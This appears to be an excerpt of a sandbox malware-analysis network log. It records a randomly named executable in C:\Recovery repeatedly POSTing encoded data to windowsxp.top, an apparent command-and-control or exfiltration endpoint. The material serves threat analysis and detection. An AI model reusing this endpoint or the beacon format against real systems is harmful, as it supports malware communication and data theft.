                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WbjEzVxG8KLDp9NuifszSBITyUoYQk5i2s5284nA77%2FF%2FdP%2BobdPr2CBljNbsGlOrkKUwUAz3W1atuufnz899OXL80%2FCPwYenB7nigEFkLd4yZypuNocwq%2BQ8tWy3uAv"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b7d00db46c6c-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1216&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1339500&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
58 | 192.168.2.4 | 49986 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
Timestamp | Bytes transferred | Direction | Data
Oct 27, 2024 19:23:34.809389114 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1008
                                                                                                                  Expect: 100-continue
Oct 27, 2024 19:23:35.164880991 CET | 1008 | OUT | Data Raw: 55 50 58 5e 5e 58 53 50 54 58 57 54 54 55 5b 5d 59 58 5b 5e 52 5f 52 5d 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UPX^^XSPTXWTTU[]YX[^R_R]T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY$&$5*#&.(\088U8.'(<8U71,,[$=,&[9?!Y##X(
Oct 27, 2024 19:23:35.406498909 CET | 25 | IN | HTTP/1.1 100 Continue
Oct 27, 2024 19:23:35.980652094 CET | 772 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:35 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cauI1fF4PZmvKfIZqEel%2F%2FP0tUdN7bzPnhliRgW4v3GDMjAx4geGtAAuJdA9T2XjTQXHHx%2F%2Bhacdf%2BXcUGqhPUxival5%2Fna4hzf6LzjbJt1KZuss0YOiUUhBBQln8vEb"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b7d5ef3c46e3-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1863&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1329&delivery_rate=799116&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a
                                                                                                                  Data Ascii: 41R[P
Oct 27, 2024 19:23:35.980669022 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0
Oct 27, 2024 19:23:35.982347965 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
59 | 192.168.2.4 | 49994 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
Timestamp | Bytes transferred | Direction | Data
Oct 27, 2024 19:23:36.135216951 CET | 345 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Oct 27, 2024 19:23:36.755479097 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:36.963280916 CET | 774 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:36 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G4cd%2B%2FGhqY1ETM6fNJ1PMg5r0xBzuDbyWWB5Km8tQfPmPkbD%2BIikN57MlTtIOUANOmNUPZyMLKRKxYf1lRGUwbHT9b5ebx6WG2UlB7LOJn%2BSxEhbB68FxTY1h7jAEnQy"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b7de5a764683-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1278&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1357&delivery_rate=1164923&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  60 | 192.168.2.4 | 49999 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Oct 27, 2024 19:23:37.088004112 CET | 345 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Oct 27, 2024 19:23:37.697647095 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:37.965328932 CET | 771 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:37 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6QS8iyG7yXgBtN2Td6xlmSey0jXaTf7Muz8L9MaZYt%2F4vGacn9I%2FsnjG%2FBQSnj3mJQUG3vLTzrKzl85YDl53ouUdWZA3YbDCzZjIwv6FdoC2UqV%2FOgL%2Fu4kf5MHLz37G"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b7e4385b6b3c-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1263&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1357&delivery_rate=1121611&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a
                                                                                                                  Data Ascii: 41R[P
                                                                                                                  Oct 27, 2024 19:23:37.965369940 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  61 | 192.168.2.4 | 50008 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Oct 27, 2024 19:23:38.089286089 CET | 345 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  62 | 192.168.2.4 | 50009 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Oct 27, 2024 19:23:38.483093977 CET | 345 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1716
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Oct 27, 2024 19:23:39.057583094 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:39.363708019 CET | 923 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:39 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bm%2BFVRppDKVfML%2FkRaKVTB%2FYUZqdyrqUXh3ZtHF2owv0PPlgX2hmkZ%2FEA3fUHNSJwIr0BYABK3kfi18aNkZWsN8j3VxClw8QoOL5MMd69dgLEbRbX0QYROrFgwXCGV6O"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b7ecbe8245f3-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1093&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2061&delivery_rate=1341983&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  63 | 192.168.2.4 | 50010 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Oct 27, 2024 19:23:38.642837048 CET | 345 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Oct 27, 2024 19:23:39.243845940 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:39.548991919 CET | 774 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:39 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QXVkiuK4eWUCuN76LcC6hnfeVEX%2FnKmMpGQ3iE%2Fq%2FCGAG%2Fa4NHb058NgNn3WYtMUU4Nt3uqWw%2FG%2FRspLOlQxcZ8Xo8VEpd1RXTLqi1gHSGI%2Fg5fsLwO0RFO0tBQ1ZdfB"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b7edee5e3aa6-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1252&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1357&delivery_rate=928205&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a
                                                                                                                  Data Ascii: 41R[P
                                                                                                                  Oct 27, 2024 19:23:39.549011946 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  64 | 192.168.2.4 | 50017 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Oct 27, 2024 19:23:39.697731972 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:40.302079916 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:40.598712921 CET | 770 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:40 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ENrIhVT8vD1VshqxKtPMciKiLolIGWH0vTkp1cNq3D36XtjGsdSH5bCMvlo0mkzQsykIJG6wOQ0rTENVU1MN5Yi%2Ft1e6ZOZEI0CoiI3Tv2epW%2BPDSSKXttksyx1423Ae"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b7f48c31ea8c-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1197&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1157474&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  65 | 192.168.2.4 | 50023 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Oct 27, 2024 19:23:40.815393925 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:41.427539110 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:41.639210939 CET | 765 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:41 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a18Jd70F6kJ97wU6XeoUULAmebIPttynSoYIN28%2BSqi2N2M8ORI18utM42DBSAomZsHUQvYEf%2F5AVUmJQni1pzxWtcPasc3d0FY7UX6JRf8emsEq4l67CASjJm5e5Ekf"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b7fb8a823ab0-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1132&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1327222&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a
                                                                                                                  Data Ascii: 41R[P
                                                                                                                  Oct 27, 2024 19:23:41.639252901 CET  5  IN  Data Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                  66          192.168.2.4  50032        188.114.97.3    80                3512  C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  Timestamp  Bytes transferred  Direction  Data
                                                                                                                  Oct 27, 2024 19:23:41.769871950 CET  321  OUT  POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:42.173346043 CET  1012  OUT  Data Raw: 55 54 58 5f 5e 5c 56 56 54 58 57 54 54 5d 5b 5b 59 50 5b 5c 52 50 52 53 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UTX_^\VVTXWTT][[YP[\RPRST\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY$2- _"%558^.'3$+(Q/>?##";[,[#).X-!Y##X(
                                                                                                                  Oct 27, 2024 19:23:42.372852087 CET  25  IN  HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:42.591228962 CET  770  IN  HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:42 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cv7owFSGkXhxzaHun3KpyKuNpUgSl56XWZZBmH0tB8st7tnt9sbO87JFRUOkzTFZbZOzqj9xy6QOL5SMUDVDIXYTVAtEqgRy4%2FbkH%2FX1Ihu8LATsY5NQF4lKVvE3DLAm"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b8017a946bdd-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1164&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1282550&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                  67          192.168.2.4  50039        188.114.97.3    80                3512  C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  Timestamp  Bytes transferred  Direction  Data
                                                                                                                  Oct 27, 2024 19:23:42.934261084 CET  321  OUT  POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:43.289904118 CET  1012  OUT  Data Raw: 55 5a 58 5c 5e 59 56 55 54 58 57 54 54 51 5b 5b 59 50 5b 5a 52 57 52 52 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UZX\^YVUTXWTTQ[[YP[ZRWRRT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY''>(!)6!&+,70\04,X S(/ +-.?Y)<>_-?!Y##X(3
                                                                                                                  Oct 27, 2024 19:23:43.535711050 CET  25  IN  HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:43.839453936 CET  780  IN  HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:43 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RJKSbAEOJgHtL4bKumPBPv%2BuOy1sLgqDfbr9l4MqvVprtIrNe0GHDsX3sbA2Ku5kVkDvOpelgDW3kliP6ukyhkjiH%2BUGZseDp%2FgJPqZjExu9TKC4%2BtfG9%2F%2BicCx%2Fuz7s"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b808bab40c1f-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1166&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1309222&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                  68          192.168.2.4  50045        188.114.97.3    80                3512  C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  Timestamp  Bytes transferred  Direction  Data
                                                                                                                  Oct 27, 2024 19:23:43.983424902 CET  321  OUT  POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:44.336946964 CET  1012  OUT  Data Raw: 55 56 58 58 5e 59 56 50 54 58 57 54 54 53 5b 5e 59 58 5b 59 52 54 52 5f 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UVXX^YVPTXWTTS[^YX[YRTR_T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'\&< 9&6%'-$Y0+--7>4#8,=0=,.[9?!Y##X(;
                                                                                                                  Oct 27, 2024 19:23:44.585088968 CET  25  IN  HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:44.783058882 CET  778  IN  HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:44 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tDxn%2BDUlEnqylr%2FV2qXJasbKnYi9pCTZqLXQUUuUN37I17YovCMSK6vpIIpKnyTKVfZiy4mMqRu%2BT%2F%2FA4UHqrr4lvcYAjAAQx9bKzI6J2n83uThyw59LehEjMnCcDB%2BM"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b80f4b350c27-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1284&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1093655&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                  69          192.168.2.4  50046        188.114.97.3    80                3512  C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  Timestamp  Bytes transferred  Direction  Data
                                                                                                                  Oct 27, 2024 19:23:44.401252985 CET  321  OUT  POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
